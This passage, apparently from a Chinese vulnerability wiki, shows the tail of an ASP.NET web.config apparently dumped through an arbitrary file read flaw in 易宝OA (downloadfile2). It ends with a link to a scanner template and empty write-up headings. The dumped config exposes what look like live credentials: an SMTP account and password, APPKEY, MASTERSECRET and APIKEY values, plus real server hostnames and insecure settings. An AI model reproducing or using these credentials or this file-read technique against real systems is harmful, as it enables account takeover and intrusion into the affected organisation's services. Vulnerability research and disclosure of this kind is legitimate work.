    <add key="BillUpLoadPath" value="D:\Topvision\SmartTradeServer\UpLoadPath\BillUpLoadPath" />
    
    <add key="TaskExcelUpLoadPath" value="D:\Topvision\SmartTradeServer\UpLoadPath\TaskExcelUpLoadPath" />
    
    <add key="LogLevel" value="1" />
    
    <add key="LoginFormStyle" value="0" />
    
    <add key="SQLCommandRunTimeout" value="1000" />
    
    <add key="SearchFinancialLen" value="3" />
    
    <add key="VNCSponsorID" value="0" />
    
    <add key="VNCServerAddress" value="vnc.its365.net" />
    
    <add key="VNCServerPort" value="23" />
    
    <add key="HelpServerAddress" value="help.topvision.me" />
    
    <add key="UseDefaultCredentials" value="false" />
    <add key="SMTPEnableSSL" value="True" />
    <add key="SMTPHost" value="smtp.qq.com" />
    <add key="SMTPPort" value="587" />
    <add key="SMTPUser" value="3080024452@qq.com" />
    <add key="SMTPCC" value="" />
    <add key="SMTPPassword" value="ofpjylxrbapedeae" />
    <add key="SMTPFrom" value="3080024452@qq.com" />
    
    
    <add key="UpdateServicePath" value="D:\Topvision\SmartTradeServer\update" />
    
    <add key="BackupServicePath" value="D:\Topvision\SmartTradeServer\Backup" />
    
    <add key="MessageServicePath" value="D:\Topvision\SmartTradeServer\Message" />
    
    <add key="TaskServicePath" value="D:\Topvision\SmartTradeServer\Task" />
    
    <add key="SafeNetUri" value="localhost:1947" />
    
    <add key="SMSServer" value="http://sms.its365.net/SMSSend.aspx" />
    <add key="SMSUserName" value="" />
    <add key="SMSPassword" value="" />
    
    <add key="AndRoidVersion" value="1.6.7.4" />
    <add key="AndRoidDownLoadUrl" value="http://www.its365.net:8080/" />
    
    <add key="AndRoidAPPVersion" value="1.1.1" />
    <add key="AndRoidAPPDownLoadUrl" value="http://www.its365.net:8080/" />
    
    <add key="TVAppVersion" value="1.0.0.7" />
    <add key="TVAppVersionDownLoadUrl" value="http://www.its365.net:8080/TV/" />
    
    <add key="APPID" value="QnzUMDGQhK72AeyOLIiyz2" />
    <add key="APPKEY" value="by6TulalzK76FpC450LZy" />
    <add key="MASTERSECRET" value="yg98TLlHHL6Ev09Ph9g8H6" />
    <add key="webpages:Enabled" value="false" />
    <add key="PreserveLoginUrl" value="true" />
    <add key="ClientValidationEnabled" value="true" />
    <add key="UnobtrusiveJavaScriptEnabled" value="true" />
    
    <add key="YunAPP" value="0" />
    
    <add key="AppUserNum" value="heQ17r2lkrMQDDINGv7Ttw==" />
    <add key="ScanUserNum" value="IEQ82dfxgegPP4tveVgjjA==" />
    
    <add key="ProductInventoryCacheServer" value="0" />
    <add key="ProMaterielArrangeEffect" value="0" />
    
    <add key="APIKEY" value="by6Tulal85zK76FpC1450LFCX" />
  </appSettings>
  
  
  <system.web>
    
    
    <customErrors mode="Off" defaultRedirect="/ErrPage" />
    <compilation targetFramework="4.0" />
    <authentication mode="None" />
    <httpRuntime maxRequestLength="102400" useFullyQualifiedRedirectUrl="false" executionTimeout="951200" minFreeThreads="8" minLocalRequestFreeThreads="4" appRequestQueueLimit="10000" enableVersionHeader="true" />
    <pages controlRenderingCompatibilityVersion="4.0" validateRequest="false">
      <namespaces>
        <add namespace="System.Web.Helpers" />
        <add namespace="System.Web.Mvc" />
        <add namespace="System.Web.Mvc.Ajax" />
        <add namespace="System.Web.Mvc.Html" />
        <add namespace="System.Web.Optimization" />
        <add namespace="System.Web.Routing" />
        <add namespace="System.Web.WebPages" />
      </namespaces>
    </pages>
    <profile defaultProvider="DefaultProfileProvider">
      <providers>
        <add name="DefaultProfileProvider" type="System.Web.Providers.DefaultProfileProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
      </providers>
    </profile>
    <membership defaultProvider="DefaultMembershipProvider">
      <providers>
        <add name="DefaultMembershipProvider" type="System.Web.Providers.DefaultMembershipProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="false" requiresUniqueEmail="false" maxInvalidPasswordAttempts="5" minRequiredPasswordLength="6" minRequiredNonalphanumericCharacters="0" passwordAttemptWindow="10" applicationName="/" />
      </providers>
    </membership>
    <roleManager defaultProvider="DefaultRoleProvider">
      <providers>
        <add name="DefaultRoleProvider" type="System.Web.Providers.DefaultRoleProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
      </providers>
    </roleManager>
    
    <sessionState mode="InProc" timeout="1" customProvider="DefaultSessionProvider">
      <providers>
        <add name="DefaultSessionProvider" type="System.Web.Providers.DefaultSessionStateProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" />
      </providers>
    </sessionState>
  </system.web>
  <system.webServer>
    <httpProtocol>
      <customHeaders>
        <add name="Access-Control-Allow-Origin" value="*" />
        <add name="Access-Control-Max-Age" value="30" />
        <add name="Access-Control-Allow-Methods" value="GET,POST,OPTIONS" />
        <add name="Access-Control-Allow-Headers" value="Content-Type, Accept" />
      </customHeaders>
    </httpProtocol>
    <validation validateIntegratedModeConfiguration="false" />
    <modules runAllManagedModulesForAllRequests="true" />
    <handlers>
      <remove name="ExtensionlessUrlHandler-ISAPI-4.0_32bit" />
      <remove name="ExtensionlessUrlHandler-ISAPI-4.0_64bit" />
      <remove name="ExtensionlessUrlHandler-Integrated-4.0" />
      <add name="ExtensionlessUrlHandler-ISAPI-4.0_32bit" path="*." verb="GET,HEAD,POST,DEBUG,PUT,DELETE,PATCH,OPTIONS" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_isapi.dll" preCondition="classicMode,runtimeVersionv4.0,bitness32" responseBufferLimit="0" />
      <add name="ExtensionlessUrlHandler-ISAPI-4.0_64bit" path="*." verb="GET,HEAD,POST,DEBUG,PUT,DELETE,PATCH,OPTIONS" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" preCondition="classicMode,runtimeVersionv4.0,bitness64" responseBufferLimit="0" />
      <add name="ExtensionlessUrlHandler-Integrated-4.0" path="*." verb="GET,HEAD,POST,DEBUG,PUT,DELETE,PATCH,OPTIONS" type="System.Web.Handlers.TransferRequestHandler" preCondition="integratedMode,runtimeVersionv4.0" />
    </handlers>
    <security>
      <requestFiltering allowDoubleEscaping="true" />
    </security>
    <staticContent>
      <remove fileExtension=".woff" />
      <mimeMap fileExtension=".woff" mimeType="application/x-font-woff" />
      <remove fileExtension=".woff2" />
      <mimeMap fileExtension=".woff2" mimeType="application/x-font-woff2" />
      <remove fileExtension=".ttf" />
      <mimeMap fileExtension=".ttf" mimeType="application/x-font-truetype" />
      <remove fileExtension=".svg" />
      <mimeMap fileExtension=".svg" mimeType="image/svg+xml" />
      <remove fileExtension=".otf" />
      <mimeMap fileExtension=".otf" mimeType="application/x-font-opentype" />
      <remove fileExtension=".eot" />
      <mimeMap fileExtension=".eot" mimeType="application/vnd.ms-fontobject" />
    </staticContent>
  </system.webServer>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Helpers" publicKeyToken="31bf3856ad364e35" />
        <bindingRedirect oldVersion="1.0.0.0-2.0.0.0" newVersion="2.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Mvc" publicKeyToken="31bf3856ad364e35" />
        <bindingRedirect oldVersion="1.0.0.0-4.0.0.0" newVersion="4.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.WebPages" publicKeyToken="31bf3856ad364e35" />
        <bindingRedirect oldVersion="1.0.0.0-2.0.0.0" newVersion="2.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="WebGrease" publicKeyToken="31bf3856ad364e35" />
        <bindingRedirect oldVersion="0.0.0.0-1.3.0.0" newVersion="1.3.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-11.0.0.0" newVersion="10.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
  <entityFramework>
    <defaultConnectionFactory type="System.Data.Entity.Infrastructure.LocalDbConnectionFactory, EntityFramework">
      <parameters>
        <parameter value="v13.0" />
      </parameters>
    </defaultConnectionFactory>
  </entityFramework>
</configuration>
```
[易宝OA-downloadfile2-文件读取.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219601255-19c36915-3cfa-4242-864a-2678edf4c460.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219601255-19c36915-3cfa-4242-864a-2678edf4c460.yaml%22%2C%22name%22%3A%22%E6%98%93%E5%AE%9DOA-downloadfile2-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.yaml%22%2C%22size%22%3A813%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ua91c4b17-340b-41c6-971e-9b929e30870%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22u2acbc0b7%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tun3wbyofzew0g0q>

fofamini-wiki

易宝OA downloadfile2 任意文件读取漏洞

一、漏洞简介

二、影响版本

三、资产测绘

四、漏洞复现